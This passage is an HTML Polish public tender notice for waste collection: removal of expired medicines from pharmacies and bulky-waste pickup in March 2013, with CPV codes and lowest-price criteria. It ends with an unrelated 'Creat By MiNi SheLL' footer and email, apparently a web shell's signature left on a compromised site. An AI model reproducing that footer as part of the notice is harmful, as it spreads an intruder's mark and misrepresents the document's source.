d)   naprawa szkód powstałych w trakcie wykonania czynności wymienionych w punktach a), b),c) 
Czynności wymienione w zakresie punktów a), b), c) winny być wykonywane z częstotliwością wskazaną przez Zamawiającego, lecz nie rzadziej niż jeden raz w miesiącu, a czynności opisane w punkcie d) według potrzeb, lecz nie później niż 7 dni od daty powstania szkody.
Wywóz surowców selektywnie gromadzonych będzie odbywał się z 1 szt. kontenera uniwersalnego typ 6049 poj.380 l.  Malowany, pogumowany, o rozmiarach 1200 x 800 x 600 mm, przystosowany do manipulacji dźwigiem. Przewidywana usługa nie może przekroczyć wywozu w ilości 2 szt. pojemników w okresie trwania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1f Wywóz przeterminowanych leków.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> W części 1f WYWÓZ PRZETERMIOWANYCH LEKÓW (pojemniki na przeterminowane leki) 
a)  odbiór pojemników z punktów ich zbiórki (czynność ta obejmuje również załadunek na środki transportu. Czynności wymienione w częściach od 1a do 1f w zakresie punktów a), b), c) winny być wykonywane z częstotliwością wskazaną przez Zamawiającego, lecz nie rzadziej niż jeden raz w miesiącu, a czynności opisane w punkcie d) według potrzeb, lecz nie później niż 7 dni od daty powstania szkody. 
Wykaz punktów zbiórki odpadów zawiera załącznik nr 7,
b)  przewóz na trasie punkt zbiórki - wyspecjalizowany odbiorca (w tym rozładunek u odbiorcy).Wywóz surowców selektywnie gromadzonych będzie odbywał się z 8 pojemników o pojemności ok. 100 dcm3 zlokalizowanych w 8 aptekach (po 1 pojemniku w każdej aptece). Przewidywana usługa nie może przekroczyć wywozu w ilości 48 szt. pojemników do końca trwania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2 zbiórka odpadów wielkogabarytowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 - w zakresie zbiórki odpadów wielkogabarytowych
Odbiór wg haromonogramu odpadów wielkogabarytowych określonego w załączniku nr 8 SIWZ 
Wykonawca będzie odbierał następujące rodzaje odpadów:
-Zużyty sprzęt AGD i RTV;
-Złom metalowy;
-Zużyte meble; 
-Elementy stolarki;
-Zużyte dywany i wykładziny;
-Opony
-Inne odpady, niestanowiące grupy odpadów niebezpiecznych - bez papy, gałęzi, liści.
Obowiązki Wykonawcy:
-Zebranie (w tym załadunek na środek transportu) zgromadzonych odpadów;
-Dostarczenie i rozładunek odpadów do punktów docelowej zbiórki odpadów segregowanych i wielkogabarytowych, z którymi Wykonawca ma podpisane umowy, po uwzględnieniu rodzaju zebranych odpadów; 
-Sprzątanie miejsca, z którego odbierane były odpady; 
-Usuwanie szkód powstałych z winy Wykonawcy w trakcie załadunku, transportu i wyładunku odpadów;
-Po zakończeniu każdego dnia zbiórki, przekazywanie Zamawiającemu informacji z wykonania dziennego harmonogramu pracy;
-Złożenie w siedzibie Zamawiającego zbiorczego protokołu i sprawozdania z wykonanych prac nie później niż w terminie 7 dni po zakończeniu akcji. 
W sprawozdaniu należy podać ilości zebranych odpadów.
Czynności wymienione w części 2 będą wykonane wg harmonogramu stanowiącemu załącznik nr 8 SIWZ w dniach 12.03.2013 r.,13.03.2013 r., 14.03.2013 r.,15.03.2013 r.

..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.10.00-2, 90.51.31.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com